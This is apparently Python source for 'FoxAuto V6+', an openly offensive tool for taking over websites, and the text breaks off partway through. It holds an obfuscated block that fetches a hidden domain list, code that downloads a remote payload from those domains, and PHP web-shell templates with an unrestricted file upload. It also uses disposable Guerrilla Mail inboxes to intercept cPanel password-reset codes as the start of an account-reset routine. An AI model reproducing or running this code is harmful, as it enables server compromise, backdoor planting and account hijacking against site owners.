_____________bgsgtttfdbfg=requests.get(str("".join(chr(__RSV) for __RSV in [((____nthikhotjssa<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+(_____chsqpefvmbxg<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+(______ttwxoebqsbsu<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+_____chsqpefvmbxg+______ttwx
oebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdg
oqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu),(_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdg
oqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))])), headers = headers , timeout =((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))))
_____________bgsgtttfdbfg=content_Fox(_____________bgsgtttfdbfg)
if (re.findall(re.compile(str("".join(chr(__RSV) for __RSV in [(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthi
khotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu)]))),_____________bgsgtttfdbfg)):
___________onielzvjdokg=re.findall(re.compile(str("".join(chr(__RSV) for __RSV in [(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmd
goqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu)]))),_____________bgsgtttfdbfg)
else :
getError((_vsqmdgoqxczl**_vsqmdgoqxczl))
return (()==[])
____________gwbahwaesaqz=re.findall(re.compile(str("".join(chr(__RSV) for __RSV in [(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxcz
l)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu)]))),_____________bgsgtttfdbfg)
except :
getError((_vsqmdgoqxczl**_vsqmdgoqxczl))
return (()==[])
def log() :
log = """
{}[#]{} Create By ::
{} ___ ______
{} / _ \ | ___|
{}/ /_\ \_ __ ___ _ __ _ _ _ __ ___ ___ _ _ ___ | |_ _____ __
{}| _ | '_ \ / _ \| '_ \| | | | '_ ` _ \ / _ \| | | / __|| _/ _ \ \/ /
{}| | | | | | | (_) | | | | |_| | | | | | | (_) | |_| \__ \| || (_) > <
{}\_| |_/_| |_|\___/|_| |_|\__, |_| |_| |_|\___/ \__,_|___/\_| \___/_/\_\
{} __/ |
{} |___/ {}FoxAuto {}V6+ {}[Priv8]
""".format(fr, fw, fg, fr, fg, fr, fg, fr, fg, fr, fw, fg, fr)
for line in log.split("\n"):
print(line)
time.sleep(0.15)
headers = {'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'referer': 'bing.com'}
def shellFox():
try:
global shell_Fox
global checkups
for d in ____________gwbahwaesaqz :
try:
shell_Fox = requests.get('https://{}/_@files/php/FoxAutoV6Plus.txt'.format(d), headers=headers, timeout=15)
shell_Fox = content_Fox(shell_Fox)
except :
shell_Fox = ''
if ('FoxAuto' in shell_Fox):
checkups = shell_Fox
break
if ('FoxAuto' not in shell_Fox):
getError(0)
exit(0)
except :
getError(0)
exit(0)
testSendA = """
<?php
error_reporting(0);
?>
Upload is <b><color>WORKING</color></b><br>
Check Mailling ..<br>
<form method="post">
<input type="text" placeholder="E-Mail" name="email" value="<?php print $_POST['email']?>"required ><input type="text" placeholder="Order ID" name="orderid" value="<?php print $_POST['orderid']?>" ><br>
<input type="submit" value="Send test >>">
</form>
<br>
<?php
if (!empty($_POST['email'])){
if (!empty($_POST['email'])){
$xx =$_POST['orderid'];
}
else{
$xx = rand();
}
mail($_POST['email'],"Result Report Test - ".$xx,"WORKING ! FoxAuto V6+");
print "<b>send an report to [".$_POST['email']."] - Order : $xx</b>";
}
?>
"""
testSendB = """
<?php
error_reporting(0);
?>
Upload is <b><color>WORKING</color></b><br>
Check Mailling ..<br>
<form method="post">
<input type="text" placeholder="E-Mail" name="email" value="<?php print $_POST['email']?>"required ><input type="text" placeholder="Order ID" name="orderid" value="<?php print $_POST['orderid']?>" ><br>
<input type="submit" value="Send test >>">
</form>
<br>
<?php
if ($_GET['Ghost'] =='send'){
$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if ( isset($_FILES["userfile"]) ) {
echo "Upload ";
if (move_uploaded_file
($_FILES["userfile"]["tmp_name"], $uploadfile))
echo $uploadfile;
else echo "failed";
}
echo "
<form name='uplform' method='post' action='?Ghost=send'
enctype='multipart/form-data'>
<p align='center'>
<input type='file' name='userfile'>
<input type='submit'>
</p>
";
}
if (!empty($_POST['email'])){
if (!empty($_POST['email'])){
$xx =$_POST['orderid'];
}
else{
$xx = rand();
}
mail($_POST['email'],"Result Report Test - ".$xx,"WORKING ! FoxAuto V6+");
print "<b>send an report to [".$_POST['email']."] - Order : $xx</b>";
}
?>
"""
def changemail_Fox():
try :
session = requests.session()
payload = {"f": "get_email_address"}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload)
email_Fox = r.json()["email_addr"]
return email_Fox, session.cookies
except :
return False
def checkinbox(cookies,user):
Scode_F0x = 'AnonymousFox'
try :
cookies={"PHPSESSID":cookies}
session = requests.session()
payload_Fox = {"f": "set_email_user", "email_user":user, "lang":"en"}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload_Fox, cookies=cookies)
payload_Fox = {"f": "check_email", "seq": "1"}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload_Fox, cookies=cookies)
for email in r.json()["list"]:
if ('cpanel' in email["mail_from"]):
email_id = email["mail_id"]
payload_Fox = {"f": "fetch_email", "email_id": email_id}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload_Fox, cookies=cookies)
Scode_F0x = r.json()['mail_body'].split('<p style="border:1px solid;margin:8px;padding:4px;font-size:16px;width:250px;font-weight:bold;">')[1].split('</p>')[0]
payload_Fox = {"f": "del_email","email_ids[]":int(email_id)}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload_Fox, cookies=cookies)
else :
Scode_F0x = 'AnonymousFox'
return Scode_F0x
except :
return Scode_F0x
def checkinboxTestPHP(cookies, user, code):
rz = 'bad'
try :
cookies={"PHPSESSID":cookies}
session = requests.session()
payload = {"f": "set_email_user", "email_user":user, "lang":"en"}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload, cookies=cookies)
payload = {"f": "check_email", "seq": "1"}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload, cookies=cookies)
for email in r.json()["list"]:
if (str(code) in email["mail_subject"]):
rz = 'good'
else :
rz = 'bad'
return rz
except :
return rz
def resetPassword(backdor, urlShell, t) :
try :
print(' {}[*] Reset Password ..... {}(Waiting)'.format(fw, fr))
token = random_Fox(3)+'Fox'+random_Fox(3)
